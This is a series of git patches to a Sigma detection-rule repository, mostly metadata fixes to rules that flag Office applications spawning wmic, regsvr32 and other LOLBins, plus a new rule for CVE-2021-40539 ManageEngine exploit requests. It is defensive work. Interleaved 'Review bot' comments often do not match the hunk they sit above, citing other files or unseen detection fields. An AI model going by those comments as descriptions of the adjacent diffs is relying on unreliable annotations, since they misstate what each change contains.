cfe11cdf1783829c76dc303a40416de65977c79a Mon Sep 17 00:00:00 2001 
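Review bot: `WMIcommand|contains: 'Win32_Process\:\:Create'` will not match the real string: per the Sigma specification a backslash in a value escapes only `*`, `?` and `\`, and before any other character it is kept literally, so this searches for `Win32_Process\:\:Create` including the backslashes. Use `WMIcommand|contains: 'Win32_Process::Create'`. `EventType: WMIExecution` and `WMIcommand` are not fields that standard `process_creation` backend configurations map, so the rule only works against the one EDR schema it was written for; the `product: EndPoint Detection Logs` logsource shown in a later commit in this series confirms that. `selection2`'s `Image|endswith` values correctly carry the leading backslash.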
From: Cyb3rEng <88643791+Cyb3rEng@users.noreply.github.com> Date: Thu, 9 Sep 2021 21:13:02 -0600 Subject: [PATCH 0826/1367] Resolved more issues from last commit as per commetns Added the following fixes to text inside the rule: date attack.defense_evasion added custome id --- ...tor_LOLBins_Process_Creations_by_Office_applications.yml | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/rules/windows/process_creation/Monitor_LOLBins_Process_Creations_by_Office_applications.yml b/rules/windows/process_creation/Monitor_LOLBins_Process_Creations_by_Office_applications.yml index 84e82010..acc32c73 100644 --- a/rules/windows/process_creation/Monitor_LOLBins_Process_Creations_by_Office_applications.yml +++ b/rules/windows/process_creation/Monitor_LOLBins_Process_Creations_by_Office_applications.yml @@ -1,5 +1,5 @@ title: Created Executables and Files by Office Applications -id: a9505d16-644f-4f24-9002-7c322675e40d +id: c64ee10c-11e4-11ec-82a8-0242ac130003 description: This rule will monitor any office apps that spins up a new LOLBin process. This activity is pretty suspicious and should be investigated. references: - https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/ @@ -10,9 +10,9 @@ tags: - attack.t1047 - attack.t1218.010 - attack.execution - - attack.defence_evasion + - attack.defense_evasion status: experimental -Date: 2021/08/23 +date: 2021/08/23 logsource: product: Windows category: process_creation From 1102def1bf9e0f9eee9dc499d2eb9aa6d03d0617 Mon Sep 17 00:00:00 2001 From: Cyb3rEng <88643791+Cyb3rEng@users.noreply.github.com> Date: Thu, 9 Sep 2021 21:14:08 -0600 Subject: [PATCH 0827/1367] Resolved more issues from last commit as per comments Added the following fixes to text inside the rule: date attack.defense_evasion added custome id --- ...LBins_process_creations_with_Wmiprvse_parent_process.yml | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) 
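Review bot: `product: Windows` (capital W) in the logsource — backend configurations match logsource values literally, and the rest of the repository, including `Monitor_Office_Applications_Spawning_WMI_command-line.yml` from this same series, uses `product: windows`; with the capitalised value the process_creation field mappings and index selection do not apply and the rule converts as a bare, unmapped query. Change it to `product: windows`. The new id `c64ee10c-11e4-11ec-82a8-0242ac130003` is a time-based (version 1) UUID sharing node `0242ac130003` with the ids added to the sibling rules, whereas the project expects random v4 ids; a later commit in this series replaces this one, and the siblings need the same treatment.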
diff --git a/rules/windows/process_creation/Monitor_LOLBins_process_creations_with_Wmiprvse_parent_process.yml b/rules/windows/process_creation/Monitor_LOLBins_process_creations_with_Wmiprvse_parent_process.yml index 4858fc09..13fdecd3 100644 --- a/rules/windows/process_creation/Monitor_LOLBins_process_creations_with_Wmiprvse_parent_process.yml +++ b/rules/windows/process_creation/Monitor_LOLBins_process_creations_with_Wmiprvse_parent_process.yml @@ -1,5 +1,5 @@ title: Lolbins Process Creation with WmiPrvse -id: 0f33c4f0-5ac8-4462-a94a-e25d696ff5bf +id: 0d61a48a-11e5-11ec-82a8-0242ac130003 description: This rule will monitor LOLBin process creations by wmiprvse. Add more LOLBins to rule logic if needed. references: - https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/ @@ -10,9 +10,9 @@ tags: - attack.t1047 - attack.t1218.010 - attack.execution - - attack.defence_evasion + - attack.defense_evasion status: experimental -Date: 2021/08/23 +date: 2021/08/23 logsource: product: Windows category: process_creation From 2be4c699fcc696e03f191f72e74a199dd772fce4 Mon Sep 17 00:00:00 2001 From: Cyb3rEng <88643791+Cyb3rEng@users.noreply.github.com> Date: Thu, 9 Sep 2021 21:16:38 -0600 Subject: [PATCH 0828/1367] Resolved more issues from last commit as per comments Added the following fixes to text inside the rule: date attack.defense_evasion added custome id --- ...pplication_from_proxy executing_regsvr32_with_payload.yml | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/rules/windows/process_creation/Monitor_Office_Application_from_proxy executing_regsvr32_with_payload.yml b/rules/windows/process_creation/Monitor_Office_Application_from_proxy executing_regsvr32_with_payload.yml index 7b25e621..8e7f40b4 100644 --- a/rules/windows/process_creation/Monitor_Office_Application_from_proxy executing_regsvr32_with_payload.yml +++ b/rules/windows/process_creation/Monitor_Office_Application_from_proxy executing_regsvr32_with_payload.yml 
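Review bot: The replacement id `0d61a48a-11e5-11ec-82a8-0242ac130003` is a version-1 (time-based) UUID from the same generator as the other ids in this series (identical clock sequence and node `0242ac130003`), while Sigma asks for randomly generated v4 ids; generate one with `uuidgen` or `python -c 'import uuid; print(uuid.uuid4())'`. `product: Windows` should be lowercase `windows` so the backend logsource mappings apply. The detection this rule describes ("Add more LOLBins to rule logic if needed") is outside the hunk and cannot be judged here.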
@@ -1,4 +1,5 @@ title: Excel Proxy Executing Regsvr32 With Payload +id: 5c2290fc-11e5-11ec-82a8-0242ac130003 description: Excel called wmic to finally proxy execute regsvr32 with the payload. An attacker wanted to break suspicious parent-child chain (Office app spawns LOLBin).But we have command-line in the event which allow us to "restore" this suspicous parent-child chain and detect it. Monitor process creation with "wmic process call create" and LOLBins in command-line with parent Office application processes. references: - https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/ @@ -9,9 +10,9 @@ tags: - attack.t1047 - attack.t1218.010 - attack.execution - - attack.defence_evasion + - attack.defense_evasion status: experimental -Date: 2021/08/23 +date: 2021/08/23 logsource: product: Windows category: process_creation From 250a3074142e2967f5676fdf356a4710ec7f50b1 Mon Sep 17 00:00:00 2001 From: Cyb3rEng <88643791+Cyb3rEng@users.noreply.github.com> Date: Thu, 9 Sep 2021 21:17:38 -0600 Subject: [PATCH 0829/1367] Resolved more issues from last commit as per comments Added the following fixes to text inside the rule: date attack.defense_evasion added custome id --- ...Monitor_Office_Applications_Spawning_WMI_command-line.yml | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/rules/windows/process_creation/Monitor_Office_Applications_Spawning_WMI_command-line.yml b/rules/windows/process_creation/Monitor_Office_Applications_Spawning_WMI_command-line.yml index 65dc6850..9172188b 100644 --- a/rules/windows/process_creation/Monitor_Office_Applications_Spawning_WMI_command-line.yml +++ b/rules/windows/process_creation/Monitor_Office_Applications_Spawning_WMI_command-line.yml 
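Review bot: The rule's file name, `Monitor_Office_Application_from_proxy executing_regsvr32_with_payload.yml`, contains a space, which breaks the repository's `lowercase_with_underscores` naming and any shell glob or CI script that iterates rule paths unquoted; rename it to `proc_creation_win_office_proxy_regsvr32_payload.yml` or similar. `product: Windows` should be lowercase `windows`, and the new id `5c2290fc-11e5-11ec-82a8-0242ac130003` is a v1 UUID like its siblings. The description has `suspicous` and a missing space after `(Office app spawns LOLBin).`, worth tidying while the file is being touched.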
@@ -1,4 +1,5 @@ title: Office Applications Spawning Wmi Cli +id: 91d104c2-11e5-11ec-82a8-0242ac130003 description: Initial execution of malicious document calls wmic to execute the file with regsvr32 references: - https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/ @@ -9,9 +10,9 @@ tags: - attack.t1047 - attack.t1218.010 - attack.execution - - attack.defence_evasion + - attack.defense_evasion status: experimental -Date: 2021/08/23 +date: 2021/08/23 logsource: product: windows category: process_creation From 3f71f7466dbf8807bbd3149769f24f42fe46e9aa Mon Sep 17 00:00:00 2001 From: Cyb3rEng <88643791+Cyb3rEng@users.noreply.github.com> Date: Thu, 9 Sep 2021 21:19:17 -0600 Subject: [PATCH 0830/1367] Resolved more issues from last commit as per comments Added the following fixes to text inside the rule: date attack.defense_evasion added custome id --- ...ocess Create_command_execution_by_Office_Applications.yml | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/rules/windows/process_creation/Monitor_WMI_Win32_Process Create_command_execution_by_Office_Applications.yml b/rules/windows/process_creation/Monitor_WMI_Win32_Process Create_command_execution_by_Office_Applications.yml index d459f816..9ef408ef 100644 --- a/rules/windows/process_creation/Monitor_WMI_Win32_Process Create_command_execution_by_Office_Applications.yml +++ b/rules/windows/process_creation/Monitor_WMI_Win32_Process Create_command_execution_by_Office_Applications.yml @@ -1,4 +1,5 @@ title: WMI Command Execution by Office Applications +id: caec93f2-11e5-11ec-82a8-0242ac130003 description: Initial execution of malicious document calls wmic Win32_Process::Create to execute the file with regsvr32 references: - https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/ 
@@ -9,9 +10,9 @@ tags: - attack.t1047 - attack.t1218.010 - attack.execution - - attack.defence_evasion + - attack.defense_evasion status: experimental -Date: 2021/08/23 +date: 2021/08/23 logsource: product: EndPoint Detection Logs category: process_creation From e64bb1783ecbdf1897d806b0211d43d5147779b9 Mon Sep 17 00:00:00 2001 From: Cyb3rEng <88643791+Cyb3rEng@users.noreply.github.com> Date: Thu, 9 Sep 2021 21:20:16 -0600 Subject: [PATCH 0831/1367] Resolved more issues from last commit as per comments Added the following fixes to text inside the rule: date attack.defense_evasion added custome id --- ...creation_by_Office_applications_using_file_extentions.yml | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/rules/windows/process_creation/Monitor_executable_and_script_files_creation_by_Office_applications_using_file_extentions.yml b/rules/windows/process_creation/Monitor_executable_and_script_files_creation_by_Office_applications_using_file_extentions.yml index 032643c0..5775a21e 100644 --- a/rules/windows/process_creation/Monitor_executable_and_script_files_creation_by_Office_applications_using_file_extentions.yml +++ b/rules/windows/process_creation/Monitor_executable_and_script_files_creation_by_Office_applications_using_file_extentions.yml @@ -1,4 +1,5 @@ title: File Creation by Office Applications +id: f1d7f7d6-11e5-11ec-82a8-0242ac130003 description: This rule will monitor executable and script file creation by office applications. Please add more file extentions or magic bytes to the logic of your choice. references: - https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/ @@ -9,9 +10,9 @@ tags: - attack.t1047 - attack.t1218.010 - attack.execution - - attack.defence_evasion + - attack.defense_evasion status: experimental -Date: 2021/08/23 +date: 2021/08/23 logsource: product: Windows category: file_event From 7c9be6da32ecb4e1cf276ad3259595cf3f9154c0 Mon Sep 17 00:00:00 2001 
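Review bot: `product: EndPoint Detection Logs` in the first hunk is not a recognised Sigma logsource product, and every other rule in this series pairs `category: process_creation` with `product: windows`; a free-text product name will presumably not match any backend logsource configuration, so the rule would compile without the expected field mappings or index selection. Set it to `product: windows` for consistency with the rest of the set. The detection block follows the hunk and is not visible here.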
From: Cyb3rEng <88643791+Cyb3rEng@users.noreply.github.com> Date: Thu, 9 Sep 2021 21:24:05 -0600 Subject: [PATCH 0832/1367] Resolved more issues from last commit as per comments Added the following fixes to text inside the rule: date attack.defense_evasion added custome id --- ...itor_LOLBins_Process_Creations_by_Office_applications.yml | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/rules/windows/sysmon/Monitor_LOLBins_Process_Creations_by_Office_applications.yml b/rules/windows/sysmon/Monitor_LOLBins_Process_Creations_by_Office_applications.yml index 896585ff..70e69792 100644 --- a/rules/windows/sysmon/Monitor_LOLBins_Process_Creations_by_Office_applications.yml +++ b/rules/windows/sysmon/Monitor_LOLBins_Process_Creations_by_Office_applications.yml @@ -1,4 +1,5 @@ title: LOLBins Process Created With Office Application +id: 7ce4d5ba-11e6-11ec-82a8-0242ac130003 description: This rule will monitor any office apps that spins up a new LOLBin process. This activity is pretty suspicious and should be investigated. references: - https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/ @@ -9,9 +10,9 @@ tags: - attack.t1047 - attack.t1218.010 - attack.execution - - attack.defence_evasion + - attack.defense_evasion status: experimental -Date: 2021/08/23 +date: 2021/08/23 logsource: product: Windows category: process_creation From b0ad49d950b6c46c1ddace9384b1699e65c57b5b Mon Sep 17 00:00:00 2001 From: Cyb3rEng <88643791+Cyb3rEng@users.noreply.github.com> Date: Thu, 9 Sep 2021 21:27:16 -0600 Subject: [PATCH 0833/1367] changed id to v4 uuid 23daeb52-e6eb-493c-8607-c4f0246cb7d8 --- ...Monitor_LOLBins_Process_Creations_by_Office_applications.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/windows/process_creation/Monitor_LOLBins_Process_Creations_by_Office_applications.yml b/rules/windows/process_creation/Monitor_LOLBins_Process_Creations_by_Office_applications.yml index acc32c73..49245266 100644 
--- a/rules/windows/process_creation/Monitor_LOLBins_Process_Creations_by_Office_applications.yml +++ b/rules/windows/process_creation/Monitor_LOLBins_Process_Creations_by_Office_applications.yml @@ -1,5 +1,5 @@ title: Created Executables and Files by Office Applications -id: c64ee10c-11e4-11ec-82a8-0242ac130003 +id: 23daeb52-e6eb-493c-8607-c4f0246cb7d8 description: This rule will monitor any office apps that spins up a new LOLBin process. This activity is pretty suspicious and should be investigated. references: - https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/ From 2bc38a0ed4ee675ff4c2282cfae6cd3429e2ae0b Mon Sep 17 00:00:00 2001 From: Cyb3rEng <88643791+Cyb3rEng@users.noreply.github.com> Date: Thu, 9 Sep 2021 21:27:48 -0600 Subject: [PATCH 0834/1367] changed id uuid to v4 8a582fe2-0882-4b89-a82a-da6b2dc32937 --- ...r_LOLBins_process_creations_with_Wmiprvse_parent_process.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/windows/process_creation/Monitor_LOLBins_process_creations_with_Wmiprvse_parent_process.yml b/rules/windows/process_creation/Monitor_LOLBins_process_creations_with_Wmiprvse_parent_process.yml index 13fdecd3..9dab9d43 100644 --- a/rules/windows/process_creation/Monitor_LOLBins_process_creations_with_Wmiprvse_parent_process.yml +++ b/rules/windows/process_creation/Monitor_LOLBins_process_creations_with_Wmiprvse_parent_process.yml @@ -1,5 +1,5 @@ title: Lolbins Process Creation with WmiPrvse -id: 0d61a48a-11e5-11ec-82a8-0242ac130003 +id: 8a582fe2-0882-4b89-a82a-da6b2dc32937 description: This rule will monitor LOLBin process creations by wmiprvse. Add more LOLBins to rule logic if needed. references: - https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/ From a334ea167cb9cc1d9b9f4d68ded349ade1c41f79 Mon Sep 17 00:00:00 2001 
From: Cyb3rEng <88643791+Cyb3rEng@users.noreply.github.com> Date: Thu, 9 Sep 2021 21:28:17 -0600 Subject: [PATCH 0835/1367] changed id uuid to v4 c0e1c3d5-4381-4f18-8145-2583f06a1fe5 --- ...e_Application_from_proxy executing_regsvr32_with_payload.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/windows/process_creation/Monitor_Office_Application_from_proxy executing_regsvr32_with_payload.yml b/rules/windows/process_creation/Monitor_Office_Application_from_proxy executing_regsvr32_with_payload.yml index 8e7f40b4..eabcf9c8 100644 --- a/rules/windows/process_creation/Monitor_Office_Application_from_proxy executing_regsvr32_with_payload.yml +++ b/rules/windows/process_creation/Monitor_Office_Application_from_proxy executing_regsvr32_with_payload.yml @@ -1,5 +1,5 @@ title: Excel Proxy Executing Regsvr32 With Payload -id: 5c2290fc-11e5-11ec-82a8-0242ac130003 +id: c0e1c3d5-4381-4f18-8145-2583f06a1fe5 description: Excel called wmic to finally proxy execute regsvr32 with the payload. An attacker wanted to break suspicious parent-child chain (Office app spawns LOLBin).But we have command-line in the event which allow us to "restore" this suspicous parent-child chain and detect it. Monitor process creation with "wmic process call create" and LOLBins in command-line with parent Office application processes. references: - https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/ From d65881b7525afcac4e19548a0521c13b5eb51724 Mon Sep 17 00:00:00 2001 From: Cyb3rEng <88643791+Cyb3rEng@users.noreply.github.com> Date: Thu, 9 Sep 2021 21:28:58 -0600 Subject: [PATCH 0836/1367] changed id uuid to v4 04f5363a-6bca-42ff-be70-0d28bf629ead --- .../Monitor_Office_Applications_Spawning_WMI_command-line.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) 
diff --git a/rules/windows/process_creation/Monitor_Office_Applications_Spawning_WMI_command-line.yml b/rules/windows/process_creation/Monitor_Office_Applications_Spawning_WMI_command-line.yml index 9172188b..3963f86e 100644 --- a/rules/windows/process_creation/Monitor_Office_Applications_Spawning_WMI_command-line.yml +++ b/rules/windows/process_creation/Monitor_Office_Applications_Spawning_WMI_command-line.yml @@ -1,5 +1,5 @@ title: Office Applications Spawning Wmi Cli -id: 91d104c2-11e5-11ec-82a8-0242ac130003 +id: 04f5363a-6bca-42ff-be70-0d28bf629ead description: Initial execution of malicious document calls wmic to execute the file with regsvr32 references: - https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/ From 8b9cf80be250150679a8c024dd97638a53af3ecf Mon Sep 17 00:00:00 2001 From: Cyb3rEng <88643791+Cyb3rEng@users.noreply.github.com> Date: Thu, 9 Sep 2021 21:29:31 -0600 Subject: [PATCH 0837/1367] changed id uuid to v4 3ee1bba8-b9e2-4e35-bec5-7fb66b6b3815 --- ..._Process Create_command_execution_by_Office_Applications.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/windows/process_creation/Monitor_WMI_Win32_Process Create_command_execution_by_Office_Applications.yml b/rules/windows/process_creation/Monitor_WMI_Win32_Process Create_command_execution_by_Office_Applications.yml index 9ef408ef..079c49ac 100644 --- a/rules/windows/process_creation/Monitor_WMI_Win32_Process Create_command_execution_by_Office_Applications.yml +++ b/rules/windows/process_creation/Monitor_WMI_Win32_Process Create_command_execution_by_Office_Applications.yml @@ -1,5 +1,5 @@ title: WMI Command Execution by Office Applications -id: caec93f2-11e5-11ec-82a8-0242ac130003 +id: 3ee1bba8-b9e2-4e35-bec5-7fb66b6b3815 description: Initial execution of malicious document calls wmic Win32_Process::Create to execute the file with regsvr32 references: - https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/ 
From 9a42b690bdee072acb7a31472a3800288c8fd5c3 Mon Sep 17 00:00:00 2001 From: Cyb3rEng <88643791+Cyb3rEng@users.noreply.github.com> Date: Thu, 9 Sep 2021 21:30:02 -0600 Subject: [PATCH 0838/1367] changed id uuid to v4 8c6fd6fc-28fc-4597-a86a-fc1de20b039d --- ...es_creation_by_Office_applications_using_file_extentions.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/windows/process_creation/Monitor_executable_and_script_files_creation_by_Office_applications_using_file_extentions.yml b/rules/windows/process_creation/Monitor_executable_and_script_files_creation_by_Office_applications_using_file_extentions.yml index 5775a21e..28f02620 100644 --- a/rules/windows/process_creation/Monitor_executable_and_script_files_creation_by_Office_applications_using_file_extentions.yml +++ b/rules/windows/process_creation/Monitor_executable_and_script_files_creation_by_Office_applications_using_file_extentions.yml @@ -1,5 +1,5 @@ title: File Creation by Office Applications -id: f1d7f7d6-11e5-11ec-82a8-0242ac130003 +id: 8c6fd6fc-28fc-4597-a86a-fc1de20b039d description: This rule will monitor executable and script file creation by office applications. Please add more file extentions or magic bytes to the logic of your choice. references: - https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/ From a6a3f6b3924f0035365db54a9aa02c1256f5be5b Mon Sep 17 00:00:00 2001 From: Sittikorn S <61369934+BlackB0lt@users.noreply.github.com> Date: Fri, 10 Sep 2021 10:31:11 +0700 Subject: [PATCH 0839/1367] Create web_cve_2021_40539_manageengine_adselfservice_exploit.yml --- ...539_manageengine_adselfservice_exploit.yml | 27 +++++++++++++++++++ 1 file changed, 27 insertions(+) create mode 100644 rules/web/web_cve_2021_40539_manageengine_adselfservice_exploit.yml diff --git a/rules/web/web_cve_2021_40539_manageengine_adselfservice_exploit.yml b/rules/web/web_cve_2021_40539_manageengine_adselfservice_exploit.yml new file mode 100644 index 00000000..1f049dbf 
--- /dev/null +++ b/rules/web/web_cve_2021_40539_manageengine_adselfservice_exploit.yml @@ -0,0 +1,27 @@ +title: CVE-2021-40539 Zoho ManageEngine ADSelfService Plus Exploit +id: fcbb4a77-f368-4945-b046-4499a1da69d1 +status: experimental +description: Detects an authentication bypass vulnerability affecting the REST API URLs in ADSelfService Plus (CVE-2021-40539). +references: + - https://therecord.media/cisa-warns-of-zoho-server-zero-day-exploited-in-the-wild/ + - https://www.manageengine.com/products/self-service-password/kb/how-to-fix-authentication-bypass-vulnerability-in-REST-API.html +author: Sittikorn S, Nuttakorn L +date: 2021/09/10 +tags: + - attack.initial_access + - attack.t1190 +logsource: + category: webserver + definition: 'Must be collect log from \ManageEngine\ADSelfService Plus\logs' +detection: + selection: + c-uri|contains: + - '/RestAPI/LogonCustomization' + - '/RestAPI/Connection' + condition: selection +fields: + - c-ip + - c-uri +falsepositives: + - External Pentesting +level: critical From 6a7ac098edff8e996e7227bd5496ae0b77b4adc5 Mon Sep 17 00:00:00 2001 From: Cyb3rEng <88643791+Cyb3rEng@users.noreply.github.com> Date: Thu, 9 Sep 2021 21:31:20 -0600 Subject: [PATCH 0840/1367] changed id uuid to v4 b45e1519-5de5-4dfe-bef6-73bc48c2b983 --- ...Monitor_LOLBins_Process_Creations_by_Office_applications.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/windows/sysmon/Monitor_LOLBins_Process_Creations_by_Office_applications.yml b/rules/windows/sysmon/Monitor_LOLBins_Process_Creations_by_Office_applications.yml index 70e69792..d6039599 100644 --- a/rules/windows/sysmon/Monitor_LOLBins_Process_Creations_by_Office_applications.yml +++ b/rules/windows/sysmon/Monitor_LOLBins_Process_Creations_by_Office_applications.yml 
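Review bot: `c-uri|contains` on `/RestAPI/LogonCustomization` and `/RestAPI/Connection` fires on every request to those endpoints, including legitimate product traffic, so with `level: critical` and only "External Pentesting" listed as a false positive the noise is understated; if the webserver log exposes the method, constraining the selection to POST requests would tighten it considerably (the referenced KB describes the bypass through these REST URLs, which I take to be request-based). The description says the rule "Detects an authentication bypass vulnerability", but it detects requests to the affected endpoints, not the vulnerability itself; I would phrase it `description: Detects requests to the ADSelfService Plus REST API endpoints abused by the CVE-2021-40539 authentication bypass`. The `definition` string also reads awkwardly; `definition: 'Logs must be collected from \ManageEngine\ADSelfService Plus\logs'` is clearer.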
@@ -1,5 +1,5 @@ title: LOLBins Process Created With Office Application -id: 7ce4d5ba-11e6-11ec-82a8-0242ac130003 +id: b45e1519-5de5-4dfe-bef6-73bc48c2b983 description: This rule will monitor any office apps that spins up a new LOLBin process. This activity is pretty suspicious and should be investigated. references: - https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/ From f7b8fd571d03b8c29edb96146b161163a2c56326 Mon Sep 17 00:00:00 2001 From: Cyb3rEng <88643791+Cyb3rEng@users.noreply.github.com> Date: Thu, 9 Sep 2021 21:31:57 -0600 Subject: [PATCH 0841/1367] Resolved more issues from last commit as per comments Added the following fixes to text inside the rule: date attack.defense_evasion added custome id --- ...LOLBins_process_creations_with_Wmiprvse_parent_process.yml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/rules/windows/sysmon/Monitor_LOLBins_process_creations_with_Wmiprvse_parent_process.yml b/rules/windows/sysmon/Monitor_LOLBins_process_creations_with_Wmiprvse_parent_process.yml index abcb3bae..69368182 100644 --- a/rules/windows/sysmon/Monitor_LOLBins_process_creations_with_Wmiprvse_parent_process.yml +++ b/rules/windows/sysmon/Monitor_LOLBins_process_creations_with_Wmiprvse_parent_process.yml @@ -1,5 +1,5 @@ title: LOLBins Process Created With WmiPrvSE -id: f90d4ff4-db81-4576-9719-8ed45fe387c8 +id: 59447a89-5ba1-44ac-9d48-1c620a53cd0b description: This rule will monitor LOLBin process creations by wmiprvse. Add more LOLBins to rule logic if needed. references: - https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/ @@ -10,7 +10,7 @@ tags: - attack.t1047 - attack.t1218.010 - attack.execution - - attack.defence_evasion + - attack.defense_evasion status: experimental date: 2021/08/23 logsource: From ba995ef442fd7bc76a6e0324747e42303810d9fa Mon Sep 17 00:00:00 2001 
From: Cyb3rEng <88643791+Cyb3rEng@users.noreply.github.com> Date: Thu, 9 Sep 2021 21:32:42 -0600 Subject: [PATCH 0842/1367] Resolved more issues from last commit as per comments Added the following fixes to text inside the rule: date attack.defense_evasion added custome id --- ...plications_from_proxy_executing_regsvr32_with_payload.yml | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/rules/windows/sysmon/Monitor_Office_Applications_from_proxy_executing_regsvr32_with_payload.yml b/rules/windows/sysmon/Monitor_Office_Applications_from_proxy_executing_regsvr32_with_payload.yml index 0dbd9903..25eca696 100644 --- a/rules/windows/sysmon/Monitor_Office_Applications_from_proxy_executing_regsvr32_with_payload.yml +++ b/rules/windows/sysmon/Monitor_Office_Applications_from_proxy_executing_regsvr32_with_payload.yml @@ -1,4 +1,5 @@ title: Excel Proxy Executing Regsvr32 With Payload +id: 9d1c72f5-43f0-4da5-9320-648cf2099dd0 description: Excel called wmic to finally proxy execute regsvr32 with the payload. An attacker wanted to break suspicious parent-child chain (Office app spawns LOLBin).But we have command-line in the event which allow us to "restore" this suspicous parent-child chain and detect it. Monitor process creation with "wmic process call create" and LOLBins in command-line with parent Office application processes. references: - https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/ @@ -9,9 +10,9 @@ tags: - attack.t1047 - attack.t1218.010 - attack.execution - - attack.defence_evasion + - attack.defense_evasion status: experimental -Date: 2021/08/23 +date: 2021/08/23 logsource: product: Windows category: process_creation From d14c26f5f19cedea457cbcdabc9bb1ff4800885b Mon Sep 17 00:00:00 2001 
From: Cyb3rEng <88643791+Cyb3rEng@users.noreply.github.com> Date: Thu, 9 Sep 2021 21:33:36 -0600 Subject: [PATCH 0843/1367] Resolved more issues from last commit as per comments Added the following fixes to text inside the rule: date attack.defense_evasion added custome id --- ...creation_by_Office_applications_using_file_extentions.yml | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/rules/windows/sysmon/Monitor_executable_and_script_files_creation_by_Office_applications_using_file_extentions.yml b/rules/windows/sysmon/Monitor_executable_and_script_files_creation_by_Office_applications_using_file_extentions.yml index 55229ae7..01a3bfa4 100644 --- a/rules/windows/sysmon/Monitor_executable_and_script_files_creation_by_Office_applications_using_file_extentions.yml +++ b/rules/windows/sysmon/Monitor_executable_and_script_files_creation_by_Office_applications_using_file_extentions.yml @@ -1,4 +1,5 @@ title: Created Executables and Files by Office Applications +id: c7a74c80-ba5a-486e-9974-ab9e682bc5e4 description: This rule will monitor executable and script file creation by office applications. Please add more file extentions or magic bytes to the logic of your choice. references: - https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/ @@ -9,9 +10,9 @@ tags: - attack.t1047 - attack.t1218.010 - attack.execution - - attack.defence_evasion + - attack.defense_evasion status: experimental -Date: 2021/08/23 +date: 2021/08/23 logsource: product: Windows category: file_event From ca19f43a06493c648fd477199e6ce002f06934a4 Mon Sep 17 00:00:00 2001 From: Cyb3rEng <88643791+Cyb3rEng@users.noreply.github.com> Date: Thu, 9 Sep 2021 21:35:21 -0600 Subject: [PATCH 0844/1367] Resolved more issues from last commit as per comments Added the following fixes to text inside the rule: date attack.defense_evasion added custom id --- .../sysmon/Office_Applications_Spawning_WMI_command-line.yml | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) 
diff --git a/rules/windows/sysmon/Office_Applications_Spawning_WMI_command-line.yml b/rules/windows/sysmon/Office_Applications_Spawning_WMI_command-line.yml index 8fea8200..9a2cecf1 100644 --- a/rules/windows/sysmon/Office_Applications_Spawning_WMI_command-line.yml +++ b/rules/windows/sysmon/Office_Applications_Spawning_WMI_command-line.yml @@ -1,4 +1,5 @@ title: Office Applications Spawning Wmi Cli +id: 518643ba-7d9c-4fa5-9f37-baed36059f6a description: Initial execution of malicious document calls wmic to execute the file with regsvr32 references: - https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/ @@ -9,9 +10,9 @@ tags: - attack.t1047 - attack.t1218.010 - attack.execution - - attack.defence_evasion + - attack.defense_evasion status: experimental -Date: 2021/08/23 +date: 2021/08/23 logsource: product: windows category: process_creation From 6cae20b9b8124b9cce663f0fcce2af3d74ce328d Mon Sep 17 00:00:00 2001 From: Cyb3rEng <88643791+Cyb3rEng@users.noreply.github.com> Date: Thu, 9 Sep 2021 21:38:42 -0600 Subject: [PATCH 0845/1367] Changed title changed title --- ...es_creation_by_Office_applications_using_file_extentions.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/windows/sysmon/Monitor_executable_and_script_files_creation_by_Office_applications_using_file_extentions.yml b/rules/windows/sysmon/Monitor_executable_and_script_files_creation_by_Office_applications_using_file_extentions.yml index 01a3bfa4..1c4366eb 100644 --- a/rules/windows/sysmon/Monitor_executable_and_script_files_creation_by_Office_applications_using_file_extentions.yml +++ b/rules/windows/sysmon/Monitor_executable_and_script_files_creation_by_Office_applications_using_file_extentions.yml 
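Review bot: This sysmon/ file carries the same title, description, references and tags as rules/windows/process_creation/Monitor_Office_Applications_Spawning_WMI_command-line.yml edited earlier in the series, but under a different id, so two rules with the same logic would now ship and be compiled twice; two of the other sysmon/ duplicates are deleted in later patches, and this one should follow unless its detection differs in a way the hunk does not show. The same applies to the sysmon/ copies of the regsvr32-proxy and file-creation rules. Using `category: process_creation` under a sysmon/ directory also contradicts the generic logsource, which is another sign the copy is unnecessary. The detection section lies outside the hunk.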
